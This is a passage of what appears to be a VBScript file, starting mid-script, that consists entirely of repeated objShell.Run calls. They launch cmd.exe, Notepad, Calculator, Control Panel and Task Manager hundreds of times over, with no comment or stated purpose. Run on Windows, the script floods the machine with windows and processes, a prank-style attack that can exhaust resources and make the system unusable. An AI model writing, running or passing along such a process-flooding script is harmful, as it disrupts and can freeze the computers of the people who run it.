objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
